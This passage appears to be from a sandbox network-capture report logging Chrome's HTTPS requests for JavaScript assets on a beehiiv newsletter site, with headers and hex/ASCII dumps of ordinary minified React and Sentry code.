                                                                                                                                            94192.168.2.1649820104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC550OUTGET /assets/index-COqk5b7U.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC902INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 4621
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"120d-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b31f6242b0-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC467INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 39 36 30 38 66 33 63 62 2d 30 32 61 33 2d 35 61 34 36 2d 39 63 38 38 2d 30 39 38 63 36 31 65 36 38 62 37 34 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9608f3cb-02a3-5a46-9c88-098c61e68b74")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 72 20 74 20 69 6e 20 6e 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 74 29 26 26 28 65 5b 74 5d 3d 6e 5b 74 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 64 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 77 28 65 2c 72 3d 5b 5d 29 7b 6c 65 74 20 6e 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 74 28 73 2c 6c 29 7b 63 6f 6e 73 74 20 63 3d 6f 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6c 29 2c 69 3d 6e 2e 6c 65 6e 67 74 68 3b 6e 3d 5b 2e 2e 2e 6e 2c 6c 5d 3b 66 75 6e 63 74 69 6f 6e 20 66 28 24 29 7b 63 6f 6e 73 74 7b 73 63 6f 70 65 3a 75 2c 63 68 69 6c 64 72 65 6e 3a 78 2c 2e 2e 2e 70 7d 3d 24 2c 79 3d 75 3f 2e 5b 65 5d 5b 69 5d 7c 7c 63 2c 56 3d
                                                                                                                                            Data Ascii: r t in n)Object.prototype.hasOwnProperty.call(n,t)&&(e[t]=n[t])}return e},d.apply(this,arguments)}function w(e,r=[]){let n=[];function t(s,l){const c=o.createContext(l),i=n.length;n=[...n,l];function f($){const{scope:u,children:x,...p}=$,y=u?.[e][i]||c,V=
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 63 68 69 6c 64 72 65 6e 3a 6e 75 6c 6c 3a 69 29 3b 72 65 74 75 72 6e 20 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 2c 64 28 7b 7d 2c 74 2c 7b 72 65 66 3a 72 7d 29 2c 6f 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 28 6c 29 3f 6f 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 6c 2c 76 6f 69 64 20 30 2c 63 29 3a 6e 75 6c 6c 29 7d 72 65 74 75 72 6e 20 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 2c 64 28 7b 7d 2c 74 2c 7b 72 65 66 3a 72 7d 29 2c 6e 29 7d 29 3b 45 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 53 6c 6f 74 22 3b 63 6f 6e 73 74 20 62 3d 6f 2e 66 6f 72 77 61 72 64 52 65 66 28 28 65 2c 72 29 3d 3e 7b 63 6f 6e 73 74 7b 63 68 69 6c 64 72 65 6e 3a 6e 2c 2e 2e 2e 74 7d 3d 65 3b 72 65 74 75 72 6e 20 6f 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74
                                                                                                                                            Data Ascii: children:null:i);return o.createElement(b,d({},t,{ref:r}),o.isValidElement(l)?o.cloneElement(l,void 0,c):null)}return o.createElement(b,d({},t,{ref:r}),n)});E.displayName="Slot";const b=o.forwardRef((e,r)=>{const{children:n,...t}=e;return o.isValidElement
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 6e 22 3a 30 2c 22 61 72 69 61 2d 76 61 6c 75 65 6e 6f 77 22 3a 6d 28 69 29 3f 69 3a 76 6f 69 64 20 30 2c 22 61 72 69 61 2d 76 61 6c 75 65 74 65 78 74 22 3a 66 2c 72 6f 6c 65 3a 22 70 72 6f 67 72 65 73 73 62 61 72 22 2c 22 64 61 74 61 2d 73 74 61 74 65 22 3a 4e 28 69 2c 63 29 2c 22 64 61 74 61 2d 76 61 6c 75 65 22 3a 69 3f 3f 76 6f 69 64 20 30 2c 22 64 61 74 61 2d 6d 61 78 22 3a 63 7d 2c 6c 2c 7b 72 65 66 3a 72 7d 29 29 29 7d 29 3b 53 2e 70 72 6f 70 54 79 70 65 73 3d 7b 6d 61 78 28 65 2c 72 2c 6e 29 7b 63 6f 6e 73 74 20 74 3d 65 5b 72 5d 2c 61 3d 53 74 72 69 6e 67 28 74 29 3b 72 65 74 75 72 6e 20 74 26 26 21 67 28 74 29 3f 6e 65 77 20 45 72 72 6f 72 28 55 28 61 2c 6e 29 29 3a 6e 75 6c 6c 7d 2c 76 61 6c 75 65 28 65 2c 72 2c 6e 29 7b 63 6f 6e 73 74 20 74 3d
                                                                                                                                            Data Ascii: n":0,"aria-valuenow":m(i)?i:void 0,"aria-valuetext":f,role:"progressbar","data-state":N(i,c),"data-value":i??void 0,"data-max":c},l,{ref:r})))});S.propTypes={max(e,r,n){const t=e[r],a=String(t);return t&&!g(t)?new Error(U(a,n)):null},value(e,r,n){const t=
                                                                                                                                            2025-01-15 18:14:37 UTC47INData Raw: 23 20 64 65 62 75 67 49 64 3d 39 36 30 38 66 33 63 62 2d 30 32 61 33 2d 35 61 34 36 2d 39 63 38 38 2d 30 39 38 63 36 31 65 36 38 62 37 34 0a
                                                                                                                                            Data Ascii: # debugId=9608f3cb-02a3-5a46-9c88-098c61e68b74


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            95192.168.2.1649821104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC550OUTGET /assets/index-DTtuIjz-.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 2491
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"9bb-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b32b870cbe-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 38 34 38 35 65 32 31 34 2d 61 61 32 66 2d 35 62 35 39 2d 62 34 37 65 2d 63 37 38 30 64 38 66 61 30 33 32 36 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="8485e214-aa2f-5b59-b47e-c780d8fa0326")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 64 69 64 43 61 74 63 68 3a 21 31 2c 65 72 72 6f 72 3a 6e 75 6c 6c 7d 3b 63 6c 61 73 73 20 70 20 65 78 74 65 6e 64 73 20 69 2e 43 6f 6d 70 6f 6e 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 72 29 7b 73 75 70 65 72 28 72 29 2c 74 68 69 73 2e 72 65 73 65 74 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 3d 74 68 69 73 2e 72 65 73 65 74 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 73 74 61 74 65 3d 63 7d 73 74 61 74 69 63 20 67 65 74 44 65 72 69 76 65 64 53 74 61 74 65 46 72 6f 6d 45 72 72 6f 72 28 72 29 7b 72 65 74 75 72 6e 7b 64 69 64 43 61 74 63 68 3a 21 30 2c 65 72 72 6f 72 3a 72 7d 7d 72 65 73 65 74 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 28 29 7b 63 6f 6e 73 74 7b 65 72 72 6f 72 3a 72 7d 3d 74 68 69 73 2e 73 74 61
                                                                                                                                            Data Ascii: didCatch:!1,error:null};class p extends i.Component{constructor(r){super(r),this.resetErrorBoundary=this.resetErrorBoundary.bind(this),this.state=c}static getDerivedStateFromError(r){return{didCatch:!0,error:r}}resetErrorBoundary(){const{error:r}=this.sta
                                                                                                                                            2025-01-15 18:14:37 UTC654INData Raw: 6e 67 74 68 7c 7c 65 2e 73 6f 6d 65 28 28 6e 2c 74 29 3d 3e 21 4f 62 6a 65 63 74 2e 69 73 28 6e 2c 72 5b 74 5d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 7b 65 72 72 6f 72 3a 65 7d 29 7b 72 65 74 75 72 6e 20 64 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 6d 61 78 2d 77 2d 32 78 6c 20 66 6c 65 78 2d 63 6f 6c 20 73 70 61 63 65 2d 79 2d 32 20 70 79 2d 38 22 2c 63 68 69 6c 64 72 65 6e 3a 64 2e 6a 73 78 28 6d 2c 7b 61 73 3a 22 70 22 2c 74 79 70 65 3a 22 62 6f 64 79 22 2c 73 69 7a 65 3a 22 6d 64 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 74 65 78 74 2d 63 65 6e 74 65 72 20 6c 65 61 64 69 6e 67 2d 74 69 67 68 74 20 74 72 61 63 6b 69 6e 67 2d 6e 6f 72 6d 61 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6d 65 73 73 61 67 65 2e 73 70
                                                                                                                                            Data Ascii: ngth||e.some((n,t)=>!Object.is(n,r[t]))}function y({error:e}){return d.jsx("div",{className:"flex max-w-2xl flex-col space-y-2 py-8",children:d.jsx(m,{as:"p",type:"body",size:"md",className:"text-center leading-tight tracking-normal",children:e.message.sp


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            96192.168.2.1649822104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC550OUTGET /assets/index-DWIcfCyK.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 2215
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"8a7-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b35a9a4255-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 30 39 30 37 31 63 31 2d 65 65 37 34 2d 35 61 63 33 2d 38 33 33 35 2d 62 36 66 62 39 65 34 33 37 36 33 37 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="009071c1-ee74-5ac3-8335-b6fb9e437637")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 63 6f 6e 73 74 20 6b 3d 28 7b 69 73 46 75 6c 6c 57 69 64 74 68 3a 6c 3d 21 31 2c 69 6e 6c 69 6e 65 3a 6e 3d 21 31 2c 65 72 72 6f 72 43 6f 64 65 3a 74 3d 22 34 30 34 22 2c 70 75 62 6c 69 63 61 74 69 6f 6e 50 72 65 73 65 6e 74 3a 6f 3d 21 30 2c 63 75 73 74 6f 6d 54 69 74 6c 65 3a 66 2c 63 75 73 74 6f 6d 44 65 73 63 72 69 70 74 69 6f 6e 3a 68 2c 65 72 72 6f 72 3a 65 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 74 3a 61 2c 69 31 38 6e 3a 63 7d 3d 4e 28 29 2c 70 3d 63 2e 65 78 69 73 74 73 28 60 65 72 72 6f 72 73 2e 24 7b 74 7d 2e 74 69 74 6c 65 60 29 3f 61 28 60 65 72 72 6f 72 73 2e 24 7b 74 7d 2e 74 69 74 6c 65 60 29 3a 61 28 22 65 72 72 6f 72 73 2e 66 61 6c 6c 62 61 63 6b 2e
                                                                                                                                            Data Ascii: }from"./components-Oj2xMfGE.js";const k=({isFullWidth:l=!1,inline:n=!1,errorCode:t="404",publicationPresent:o=!0,customTitle:f,customDescription:h,error:e})=>{const{t:a,i18n:c}=N(),p=c.exists(`errors.${t}.title`)?a(`errors.${t}.title`):a("errors.fallback.
                                                                                                                                            2025-01-15 18:14:37 UTC378INData Raw: 2d 73 6d 20 66 6f 6e 74 2d 6d 65 64 69 75 6d 20 74 65 78 74 2d 67 72 61 79 2d 35 30 30 22 2c 63 68 69 6c 64 72 65 6e 3a 22 45 72 72 6f 72 20 44 65 74 61 69 6c 73 22 7d 29 2c 73 2e 6a 73 78 28 22 70 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 74 2d 32 20 74 65 78 74 2d 73 6d 20 74 65 78 74 2d 67 72 61 79 2d 39 30 30 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6d 65 73 73 61 67 65 7d 29 2c 65 3f 2e 73 74 61 63 6b 26 26 73 2e 6a 73 78 28 22 70 72 65 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 74 2d 32 20 77 2d 5b 33 36 30 70 78 5d 20 6f 76 65 72 66 6c 6f 77 2d 78 2d 61 75 74 6f 20 74 65 78 74 2d 73 6d 20 74 65 78 74 2d 67 72 61 79 2d 39 30 30 20 73 6d 3a 77 2d 5b 34 38 30 70 78 5d 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 73 74 61 63 6b 7d 29 5d 7d 29 5d 7d 29 7d
                                                                                                                                            Data Ascii: -sm font-medium text-gray-500",children:"Error Details"}),s.jsx("p",{className:"mt-2 text-sm text-gray-900",children:e.message}),e?.stack&&s.jsx("pre",{className:"mt-2 w-[360px] overflow-x-auto text-sm text-gray-900 sm:w-[480px]",children:e.stack})]})]})}


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            97192.168.2.1649823104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC550OUTGET /assets/index-BxYGUTX4.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC896INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 658
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957253&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=thiarowrfoONgnyHKA7xULbVsTyDvMolM8SkUTaTzuU%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957253&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=thiarowrfoONgnyHKA7xULbVsTyDvMolM8SkUTaTzuU%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"292-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b4bd5ec335-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC473INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 34 61 65 32 36 37 39 2d 37 36 31 39 2d 35 65 35 39 2d 62 65 35 61 2d 31 61 63 32 31 61 36 65 36 35 30 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c4ae2679-7619-5e59-be5a-1ac21a6e650e")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC185INData Raw: 73 4e 61 6d 65 3a 78 28 65 2c 6f 29 2c 73 74 79 6c 65 3a 74 2c 72 65 66 3a 72 2c 63 68 69 6c 64 72 65 6e 3a 73 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6e 2c 63 68 69 6c 64 72 65 6e 3a 6d 7d 29 7d 29 3b 65 78 70 6f 72 74 7b 69 20 61 73 20 42 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 69 6e 64 65 78 2d 42 78 59 47 55 54 58 34 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 63 34 61 65 32 36 37 39 2d 37 36 31 39 2d 35 65 35 39 2d 62 65 35 61 2d 31 61 63 32 31 61 36 65 36 35 30 65 0a
                                                                                                                                            Data Ascii: sName:x(e,o),style:t,ref:r,children:s.jsx("div",{className:n,children:m})});export{i as B};//# sourceMappingURL=index-BxYGUTX4.js.map//# debugId=c4ae2679-7619-5e59-be5a-1ac21a6e650e


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            98192.168.2.1649824104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC561OUTGET /assets/PoweredByBeehiiv-BmLCj73J.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
